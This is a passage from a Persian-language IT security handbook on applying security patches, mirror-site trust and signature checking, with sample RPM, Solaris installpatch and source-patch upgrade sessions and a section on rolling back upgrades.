‫ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﺩﺭ ﺧﺼﻮﺹ ﺍﺻﻼﺣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻄﺎﻟﺒﻲ ﺁﻣﻮﺧﺘﻴﺪ‪ ،‬ﺗﺄﻣﻞ ﻧﻜﻨﻴﺪ ﻭ ﺑﻼﻓﺎﺻﻠﻪ ﺁﻧﻬﺎ ﺭﺍ ﺍﻋﻤﺎﻝ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻳﻲ ﻛـﻪ‬
‫ﺑﺼﻮﺭﺕ ﻋﻤﻮﻣﻲ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﻧﺪ ﺗﻘﺮﻳﺒﹰﺎ ﺑﻼﻓﺎﺻﻠﻪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪) .‬ﺍﺻﻼﺣﻬﺎﻳﻲ ﻛﻪ ﻋﻼﻭﻩ ﺑﺮ ﺍﺻﻼﺡ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺟﺪﻳﺪﻱ ﺭﺍ ﻧﻴﺰ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺿﺎﻓﻪ ﻣﻲﻛﻨﻨﺪ ﺑﻪ ﺍﻳﻦ ﺍﻧﺪﺍﺯﻩ ﻓﻮﺭﻳﺖ ﻧﺪﺍﺭﻧﺪ‪(.‬‬
‫‪٣٠٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﺑﺪﻟﻴﻞ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻥ ﻣﻴﺰﺍﻥ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ‪ ١١٤‬ﺍﺯ ﻃﺮﻳﻖ ﺗﻜﺮﺍﺭ‪ ،‬ﻳﻚ ﻣﺰﻳـﺖ ﻣﻬـﻢ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﺣـﺴﺎﺏ‬
‫ﻣﻲﺁﻳﻨﺪ‪ .‬ﺁﻧﻬﺎ ﻫﻤﭽﻨﻴﻦ ﺯﻣﺎﻧﻲ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ ﻛﻪ ﺷﻤﺎ ﺑﺎ ﻳﻜﻲ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﺍﺭﺗﺒﺎﻁ ﺳﺮﻳﻊ ﻭ ﺑﺎ ﭘﺎﻳﮕـﺎﻩ ﺍﺻـﻠﻲ ﺍﺭﺗﺒـﺎﻁ ﻛﻨـﺪ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﭼﻨﺪ ﻧﮕﺮﺍﻧﻲ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ‪:‬‬
‫•‬
‫ﺭﺍﻫﺒﺮﺍﻥ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﻛﻨﺘﺮﻝ ﻧﺴﺨﻪﻫﺎﻱ ﻣﺤﻠﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻧﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﺧـﺮﺍﺏ ﻛﻨﻨـﺪ‪ ،‬ﺑـﺎ‬
‫ﻳﻚ ﻧﺴﺨﺔ ﺁﻟﻮﺩﻩ ﺑﻪ ﺗﺮﺍﻭﺍ ﺟﺎﻳﮕﺰﻳﻦ ﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ‪ . ...‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺷﻤﺎ ﻧﻪﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺑﻪ ﻓﺮﻭﺷﻨﺪﻩ ﺍﻋﺘﻤﺎﺩ ﻛﻨﻴﺪ‪ ،‬ﺑﻠﻜـﻪ ﺑﺎﻳـﺪ ﺑـﻪ ﺭﺍﻫﺒـﺮﺍﻥ‬
‫ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ ﻧﻴﺰ ﺍﻋﺘﻤﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺍﮔﺮ ﻓﺮﻭﺷﻨﺪﻩ ﺑﻪ ﻫﻤﺮﺍﻩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺁﻧﺮﺍ ﻧﻴﺰ ﻣﻨﺘﺸﺮ ﻛﻨﺪ )ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ‬
‫‪ PGP‬ﺑﻪ ﻫﻤﺮﺍﻩ ﺁﺭﺷﻴﻮﻫﺎﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﺍﻣﻀﺎﻫﺎﻱ ‪ gnupg‬ﺩﺭ ﻓﺎﻳﻠﻬﺎﻱ ‪ ،rpm‬ﻳﺎ ﺍﻣﻀﺎﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ (ActiveX‬ﭼـﻮﻥ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ‬
‫ﻓﺮﻭﺷﻨﺪﻩ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺧﻮﺩ ﺍﻭ ﻭ ﻧﻪ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ ﺑﺪﺳﺖ ﺑﻴﺎﻭﺭﻳﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻴﺸﺘﺮ ﻣﻄﻤﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﻛـﻪ‬
‫ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﻫﻤﺎﻥ ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﺓ ﺍﺻﻠﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻥ ﺑﻄـﻮﺭ ﺧﻮﺩﻛـﺎﺭ ﭘـﻴﺶ ﺍﺯ‬
‫ﺍﻋﻤﺎﻝ ﺍﺻﻼﺣﻬﺎ‪ ،‬ﺍﻣﻀﺎﻫﺎﻱ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫•‬
‫ﺣﺘﻲ ﺍﮔﺮ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ ﺍﻋﺘﻤﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﻭﺯﺍﻧﺔ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﮑﺎﺳﻲ ﺑﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺷـﻤﺎ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ‬
‫ﻛﺎﻓﻲ ﺳﺮﻳﻊ ﻧﺒﺎﺷﺪ‪ .‬ﺍﮔﺮ ﻳﻚ ﺍﺻﻼﺡ ﺍﻣﻨﻴﺘﻲ ﺧﻴﻠﻲ ﻣﻬﻢ ﻣﻨﺘﺸﺮ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺘﻮﺍﻧﻴﺪ ‪ ۲۴‬ﺳﺎﻋﺖ ﺻﺒﺮ ﻛﻨﻴﺪ ﻛﻪ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ‬
‫ﻣﺤﻞ ﺷﻤﺎ ﺑﻪﺭﻭﺯ ﮔﺮﺩﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺭﺍﻫﻲ ﺟﺰ ‪ download‬ﻛﺮﺩﻥ ﺍﺻﻼﺣﻬﺎ ﺑﻄﻮﺭ ﻣـﺴﺘﻘﻴﻢ ﺍﺯ ﭘﺎﻳﮕـﺎﻩ ﻓﺮﻭﺷـﻨﺪﺓ ﺍﺻـﻠﻲ ﻭﺟـﻮﺩ‬
‫ﻧﺪﺍﺭﺩ‪.‬‬
‫ﺩﺭ ﺍﻋﻤﺎﻝ ﺍﺻﻼﺣﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﮔﺮﻭﻫﻬﺎﻱ ﭘﺴﺘﻲ ﻭ ﺑﻮﻟﺘﻨﻬﺎﻱ ﻋﻤﻮﻣﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻩﺍﻳﺪ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ‪ .‬ﺩﺭ ﺑﺪﺗﺮﻳﻦ ﺣﺎﻟﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ‬
‫ﺍﺻﻼﺣﻬﺎ ﺑﺮﺍﻱ ﺍﻳﻦ ﺳﺎﺧﺘﻪ ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﻛﻪ ﺍﻓﺮﺍﺩ ﺭﺍ ﻓﺮﻳﺐ ﺩﻫﻨﺪ ﺗﺎ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺟﺪﻳﺪ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﻧﺼﺐ ﻛﻨﻨـﺪ‪ ،‬ﻭ ﺩﺭ ﺑﻬﺘـﺮﻳﻦ‬
‫ﻻ ﺑﻮﺳﻴﻠﻪ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﺑﻲﺗﺠﺮﺑﻪﺍﻱ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻳﺸﺎﻥ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺭﺍﻩﺣـﻞ‬
‫ﺣﺎﻟﺖ ﻣﻌﻤﻮ ﹰ‬
‫ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻴﺶ ﺍﺯ ﺍﺻﻼﺡ ﻛﺮﺩﻥ ﺳﻴﺴﺘﻢ ﺷﻤﺎ‪ ،‬ﺑﻪ ﺁﻥ ﺁﺳﻴﺐ ﺑﺮﺳﺎﻧﺪ‪.‬‬
‫ﺍﺭﺗﻘﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ‬
‫ﻻ ﻓﺮﺍﻳﻨﺪ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩﺍﻱ ﺍﺳﺖ‪ .‬ﺑﻌﻨـﻮﺍﻥ‬
‫ﺗﺤﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ ،Unix‬ﺍﺭﺗﻘﺎﻱ ﻳﻚ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺜﺎﻝ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ‪ bzip2-devel‬ﺩﺭ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺍﺯ ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ‪ RPM‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺩﺳﺘﻮﺭﺍﺕ ﺯﻳﺮ‬
‫ﻻﺯﻡ ﻫﺴﺘﻨﺪ‪:‬‬
‫‪# ls -l *.rpm‬‬
‫‪-rw-r--r-- 1 root root 33708 Apr 16 23:15 bzip2-devel-1.0.2-2.i386.rpm‬‬
‫‪# rpm -K bzip2-devel-1.0.2-2.i386.rpm‬‬
‫)‪Check the checksum and signature‬‬
‫‪bzip2-devel-1.0.2-2.i386.rpm: md5 OK‬‬
‫‪# rpm -Uvh bzip2-devel-1.0.2-2.i386.rpm‬‬
‫‪Upgrade the package‬‬
‫]‪Preparing... ########################################### [100%‬‬
‫]‪1:bzip2-devel ########################################### [100%‬‬
‫‪# rpm -q bzip2-devel‬‬
‫‪Confirm that the version is now 1.0.2-2‬‬
‫‪bzip2-devel-1.0.2-2‬‬
‫ﻧﺼﺐ ﻳﻚ ﺍﺻﻼﺡ ﺍﻣﻨﻴﺘﻲ ‪ Solaris‬ﻧﻴﺰ ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﺁﺳﺎﻥ ﺍﺳـﺖ‪ .‬ﺑﻌـﺪ ﺍﺯ ‪ download‬ﺍﺻـﻼﺡ ‪ 104489-15.tar.Z‬ﺍﺯ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ‬
‫‪ ،http://sunsolve.sun.com‬ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ‪ installpatch‬ﺑﺮﺍﻱ ﻧﺼﺐ ﺍﺻﻼﺡ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪:‬‬
‫‪% ls *.tar.Z‬‬
‫‪104489-15.tar.Z‬‬
‫‪% uncompress *.Z‬‬
‫‪% tar xf 104489-15.tar‬‬
‫‪% cd 104489-15‬‬
‫‪% ls‬‬
‫‪114 Software Availability‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٣٠٥‬‬
‫*‪.diPatch‬‬
‫*‪SUNWtltk/ backoutpatch* postbackout‬‬
‫*‪Install.info‬‬
‫*‪SUNWtltkd/ installpatch* postpatch‬‬
‫‪README.104489-15 SUNWtltkm/‬‬
‫*‪patchinfo‬‬
‫‪% su‬‬
‫‪Password: password‬‬
‫‪#./installpatch.‬‬
‫‪Checking installed patches...‬‬
‫‪Generating list of files to be patched...‬‬
‫‪Verifying sufficient filesystem capacity (exhaustive method)...‬‬
‫‪Installing patch packages...‬‬
‫‪Patch number 104489-15 has been successfully installed.‬‬
‫‪See /var/sadm/patch/104489-15/log for details‬‬
‫‪Executing postpatch script...‬‬
‫‪Patch packages installed:‬‬
‫‪SUNWtltk‬‬
‫‪SUNWtltkd‬‬
‫‪SUNWtltkm‬‬
‫‪# showrev -p | egrep 104489‬‬
‫‪Patch: 104489-01 Obsoletes: Packages: SUNWtltk, SUNWtltkd‬‬
‫‪Patch: 104489-14 Obsoletes: Packages: SUNWtltk, SUNWtltkd, SUNWtltkm‬‬
‫‪Patch: 104489-15 Obsoletes: Packages: SUNWtltk, SUNWtltkd, SUNWtltkm‬‬
‫ﺍﮔﺮ ﺍﺯ ﻣﺪﻳﺮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎ ﻳﺎ ﺑﻪ ﻳﻚ ﻛﻨﺘﺮﻝ ‪ CVS‬ﺭﻭﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺗﻐﻴﻴﺮﻳﺎﻓﺘﻪ ﻭ ﻳـﺎ ﺑـﻪ ﺍﻋﻤـﺎﻝ‬
‫ﻳﻚ ﺍﺻﻼﺡ ﺭﻭﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻗﺪﻳﻤﻲ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺁﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ‪ .‬ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﻣﺠﺪﺩﹰﺍ ﺗﺮﺟﻤـﻪ ﻭ ﺳـﭙﺲ‬
‫ﻧﺼﺐ ﺷﻮﺩ‪ .‬ﺩﺭ ﺍﻳﻨﺠﺎ ﻣﺜﺎﻟﻲ ﺍﺯ ﺍﻋﻤﺎﻝ ﻳﻚ ﺍﺻﻼﺡ ﺭﻭﻱ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺁﻭﺭﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺍﮔﺮ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﺭﺍ ﺍﺭﺗﻘﺎ ﻣﻲﺩﻫﻴﺪ‪ ،‬ﺑﺎﻳﺪ ﻓﺮﺍﻳﻨﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﻣﺘﻮﻗﻒ ﺳﺎﺯﻳﺪ ﻭ ﺁﻧﺮﺍ ﻣﺠﺪﺩﹰﺍ ﺑﻜﺎﺭ ﺍﻧﺪﺍﺯﻳﺪ ﺗـﺎ ﻧـﺴﺨﻪﺍﻱ‬
‫ﮐﻪ ﺗﺎﺯﻩ ﻧﺼﺐﺷﺪﻩ‪ ،‬ﺍﺟﺮﺍ ﺷﻮﺩ ‪ -‬ﺗﻌﻮﻳﺾ ﺻﺮﻑ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﺑﺮﺍﻱ ﺟﺎﻳﮕﺰﻳﻦ ﺷﺪﻥ ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﺑﺎ ﻧـﺴﺨﺔ‬
‫ﻗﺪﻳﻤﻲ ﻛﻔﺎﻳﺖ ﻧﻤﻲﻛﻨﺪ‪.‬‬
‫ﺍﺭﺗﻘﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﻛﻤﻲ ﻧﺎﻣﺘﻌﺎﺭﻑﺗﺮ ﺍﺳـﺖ‪ .‬ﺍﮔـﺮ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻳﻜـﻲ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﻫﺴﺘﻪﺍﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ‪ -‬ﻣﺎﻧﻨﺪ ‪ Internet Explorer‬ﻳﺎ ‪ - Media Player‬ﺑﺎﺷﻨﺪ‪ ،‬ﺑﻪﺭﻭﺯﺭﺳﺎﻥ ‪ WindowsUpdate‬ﺍﺩﺍﺭﺓ ﺁﻧﺮﺍ ﺑﺮ‬
‫ﻋﻬﺪﻩ ﻣﻲﮔﻴﺮﺩ؛ ﺍﻣﺎ ﻫﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﻳﮕﺮﻱ ﺑﺎﻳﺪ ﺭﻭﺵ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎ ﺍﺭﺍﺋﻪ ﻛﻨﺪ‪ .‬ﺑﻌﻀﻲﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺭﺍ ﻣﺠﺒﻮﺭ ﻛﻨﻨـﺪ ﻛـﻪ ﻧـﺴﺨﺔ‬
‫ﻗﺪﻳﻤﻲﺗﺮ ﺭﺍ ‪ uninstall‬ﻛﻨﻴﺪ ﻭ ﺗﻨﻬﺎ ﭘﺲ ﺍﺯ ﺁﻥ ﺍﺳﺖ ﮐﻪ ﺧﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴﺪ‪ ،‬ﺑﺮﺍﻱ ﺑﻌﻀﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛـﺎﻓﻲ‬
‫ﺑﺎﺷﺪ ﻛﻪ ﻧﺴﺨﻪ ﺟﺪﻳﺪ ﺭﺍ ﺭﻭﻱ ﻧﺴﺨﺔ ﻗﺪﻳﻤﻲ ﻧﺼﺐ ﻛﻨﻴﺪ‪ ،‬ﻭ ﺳﺎﻳﺮﻳﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻧﺪ ﺍﺭﺗﻘﺎﻱ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ )ﺑﺮﻧﺎﻣﻪ‪-‬‬
‫ﻫﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻧﻤﻮﻧﻪﻫﺎﻱ ﺧﻮﺑﻲ ﻫﺴﺘﻨﺪ(‪ .‬ﺷﻤﺎ ﻣﺠﺒﻮﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﻫﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺑﻪ ﺭﻭﺵ ﻣﺨﺼﻮﺹ ﺁﻥ ﻋﻤﻞ ﻛﻨﻴﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫* ‪% ls -ld‬‬
‫‪-rw-rw---- 1 dunemush dunemush 188423 Jul 20 12:07 1.7.5-patch09‬‬
‫‪drwx------ 10 dunemush dunemush 4096 Jul 4 16:15 pennmush/‬‬
‫‪% cd pennmush‬‬
‫‪% patch -p1 -s <../1.7.5-patch09‬‬
‫‪% make‬‬
‫‪....source code compile messages...‬‬
‫‪% make install‬‬
‫‪...installation messages...‬‬
‫‪%‬‬
‫‪٣٠٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﺑﻪ ﻋﻘﺐ ﻭ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‬
‫ﺑﻪﺭﻭﺯ ﺭﺳﺎﻧﻲ ﻫﻤﻴﺸﻪ ﭼﺎﺭﺓ ﻛﺎﺭ ﻧﻴﺴﺖ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﺭﺗﻘﺎﻫﺎ ﺑﻴﺶ ﺍﺯ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﺣﻞ ﻣﻲﻛﻨﻨﺪ ﻣﻮﺟﺐ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﺟﺪﻳﺪ ﺩﺭ ﺳﻴﺴﺘﻢ‬
‫ﻣﻲﺷﻮﻧﺪ؛ ﻳﺎ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻣﻬﻢ ﺭﺍ ﻣﺘﻮﻗﻒ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﻣﻮﺟﺐ ﺍﺻﻼﺡ ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﻤﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ‬
‫ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﻣﺸﺨﺺ ﺷﻮﺩ ﺍﺭﺗﻘﺎﻱ ﺍﻋﻤﺎﻝ ﺷﺪﻩ ﺣﺎﻭﻱ ﻣﺸﻜﻼﺕ ﺍﺳﺖ ﺑﺘﻮﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺑﻪ ﺣﺎﻟﺖ ﻗﺒﻞ ﺍﺯ ﺍﺭﺗﻘﺎ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ‪.‬‬
‫ﺩﻭ ﺭﺍﻫﻜﺎﺭ ﺍﺑﺘﺪﺍﻳﻲ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﻳﻚ ﺍﺭﺗﻘﺎﻱ ﺧﺮﺍﺏ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻥ ﺍﺻﻼﺡ ﺭﺍ ﺑﻪ ﻋﻘﺐ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ ﻭ ﻧﺴﺨﺔ ﻗﺒﻠـﻲ‬
‫ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﺍﺣﻴﺎ ﻛﺮﺩ‪ .‬ﺗﺤﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺘﻦ‪ ،‬ﺑﺮﻧﺎﻣﺔ ﺍﺻﻼﺡ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺣﺬﻑ ﻳﻚ ﺍﺻﻼﺡ ﺍﻋﻤﺎﻝﺷﺪﻩ ﻗﺒﻠﻲ ﻧﻴﺰ ﺑﻜـﺎﺭ ﺭﻭﺩ‪ ،‬ﻳـﺎ‬
‫ﻧﺴﺨﻪ ﻗﺒﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻳﻚ ﻣﺨﺰﻥ ‪ CVS‬ﺑﺎﺯﻳﺎﻓﺖ ﮔﺮﺩﺩ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺧﻴﻠﻲ ﺳﺨﺖ ﺑﺎﺷﺪ ﻛﻪ ﻳﻚ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍ ﺑﺼﻮﺭﺕ ﺳـﺎﻟﻢ ﻭ‬
‫ﺑﻲﺩﺭﺩﺳﺮ ﺑﻪ ﻋﻘﺐ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ‪ .‬ﻫﺮﭼﻨﺪ ﺑﻴﺸﺘﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻧـﺼﺐﺷـﺪﻩ ﺑـﺎ ﻳـﻚ‬
‫ﻧﺴﺨﺔ ﻗﺪﻳﻤﻲﺗﺮ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﮔﺮ ﻭﺍﺑﺴﺘﮕﻴﻬﺎﻱ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻫﻢ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻪ ﺑﺎﺷﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﻛﻪ ﻧﺴﺨﺔ ﻗﺪﻳﻤﻲﺗـﺮ‬
